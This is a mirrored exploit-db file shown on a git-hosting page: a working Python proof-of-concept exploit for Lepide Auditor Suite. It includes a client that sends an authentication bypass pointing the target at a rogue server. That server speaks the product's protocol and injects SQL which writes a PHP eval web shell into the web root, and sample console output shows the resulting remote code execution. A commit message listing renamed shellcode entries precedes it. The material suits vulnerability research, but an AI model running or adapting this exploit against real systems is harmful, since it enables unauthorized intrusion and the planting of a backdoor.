bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/remote/42297.py
Offensive Security 9a0992d704 DB: 2017-07-06 
3 new exploits

GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)
Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution

(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters
(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode

(Generator) - Alphanumeric Shellcode Encoder/Decoder
(Generator) - Alphanumeric Shellcode (Encoder/Decoder)

Win32 - Multi-Format Shellcode Encoding Tool (Generator)
Win32 - Multi-Format Encoding Tool Shellcode (Generator)

Linux/x86 - Self-modifying Shellcode for IDS evasion (64 bytes)
Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)

Linux/x86 - Listens for Shellcode on 5555/TCP + Jumps to it (83 bytes)
Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)

Linux/x86 - Shellcode Obfuscator
Linux/x86 - Shellcode Obfuscator (Generator)

Linux/x86 - Connectback Shellcode 127.0.0.1:31337/TCP (74 bytes)
Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)

OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)
OpenBSD/x86 - Add user _w00w00_ Shellcode (112 bytes)

Solaris/SPARC - connect-bac Shellcode k (204 bytes)
Solaris/SPARC - connect-back Shellcode (204 bytes)

Win32 - Download + Execute Shellcode (Generator) (Browsers Edition) (275+ bytes)
Win32 - Download + Execute Shellcode (Browsers Edition) (Generator)  (275+ bytes)

Windows 9x/NT/2000/XP - Reverse Generic Shellcode without Loader (249 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)

Windows XP/2000/2003 - Connect Back Shellcode for Overflow (275 bytes)
Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)

Windows - Safari JS JITed Shellcode - exec calc (ASLR/DEP bypass)
Safari 4.0.5 - 5.0.0 (Windows XP /  7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode

ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic  Shellcode (Generator)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)

Win32 - Shellcode Checksum Routine (18 bytes)
Win32 - Checksum Routine Shellcode (18 bytes)

Linux/MIPS - XOR Shellcode Encoder (60 bytes)
Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)
Linux/x86 - custom execve-Shellcode Encoder/Decoder
Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)
Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)
Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)
Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)

Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce
Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode

Linux/x86 - Bind Netcat Shellcode with Port (44/52 bytes)
Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)

Linux/x86 - Reverse TCP Shellcode (67 bytes)
2017-07-06 05:01:24 +00:00

195 lines
No EOL
6.5 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
"""
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/
Summary:
========
The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.
Additional code:
================
When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code:
root@kali:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys
if len(sys.argv) < 3:
print "(+) usage: %s <target> <attacker's server>" % sys.argv[0]
sys.exit(-1)
target = sys.argv[1]
server = sys.argv[2]
s = requests.Session()
print "(+) sending auth bypass"
s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False)
print "(+) sending code execution request"
s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'2@3','id':'6'})
Example:
========
root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016
(+) waiting for the target...
(+) connected by ('172.16.175.174', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.174', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();
In another console:
root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
"""
import struct
import socket
from thread import start_new_thread
import struct
LOGIN = 601
COLUMN = 604
FILENAME = 603
VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = "_SUCCESS_"
def get_string(conn):
size = struct.unpack(">i", conn.recv(4))[0]
data = conn.recv(size).decode("utf-16")
conn.send(struct.pack(">i", VALID))
return data
def send_string(conn, string):
size = len(string.encode("utf-16-le"))
conn.send(struct.pack(">i", size))
conn.send(string.encode("utf-16-le"))
return struct.unpack(">i", conn.recv(4))[0]
def send_tag(conn, tag):
conn.send(struct.pack(">i", TAGR))
conn.send(struct.pack(">i", tag))
return struct.unpack(">i", conn.recv(4))[0]
def send_file(conn, filedata):
if send_tag(conn, FILEN) == 2:
print "(+) successfully sent tag"
# send length of file
conn.send(struct.pack(">i", len(filedata.encode("utf-16-le"))))
# send the malicious payload
conn.send(filedata.encode("utf-16-le"))
if struct.unpack(">i", conn.recv(4))[0] == 2:
print "(+) successfully sent file!"
if send_tag(conn, VALID) == 2:
return True
return False
def client_thread(conn):
"""
Let's put it this way, my mum's not proud of my code.
"""
while True:
data = conn.recv(4)
if data:
resp = struct.unpack(">i", data)[0]
if resp == 4:
code = conn.recv(resp)
resp = struct.unpack(">i", code)[0]
# stage 1
if resp == LOGIN:
print "(+) got a login request"
# send a VALID response back
conn.send(struct.pack(">i", VALID))
# now we expect to get the username and password
print "(+) got a username: %s" % get_string(conn)
print "(+) got a password: %s" % get_string(conn)
# now we try to send to send a success packet
print "(+) sending SUCCESS packet"
if send_string(conn, SUCCESS) == 2:
print "(+) send string successful"
# stage 2
elif resp == COLUMN:
print "(+) got a column request"
# send a VALID response back
conn.send(struct.pack(">i", VALID))
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
if send_string(conn, "foo-bar") == 2:
print "(+) send string successful"
# stage 3 - this is where the exploitation is
elif resp == FILENAME:
print "(+) got a filename request"
conn.send(struct.pack(">i", VALID))
# now we read back 3 strings...
print "(+) got http request daterange: %s" % get_string(conn)
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
# exploit!
if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):
print "(+) file sent successfully"
print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0])
break
conn.close()
HOST = '0.0.0.0'
PORT = 1056
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)
print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution"
print "by mr_me 2016\t\n"
print "(+) waiting for the target..."
while True:
# blocking call, waits to accept a connection
conn, addr = s.accept()
print '(+) connected by %s' % addr
start_new_thread(client_thread, (conn,))
s.close()
Reference in a new issue View git blame Copy permalink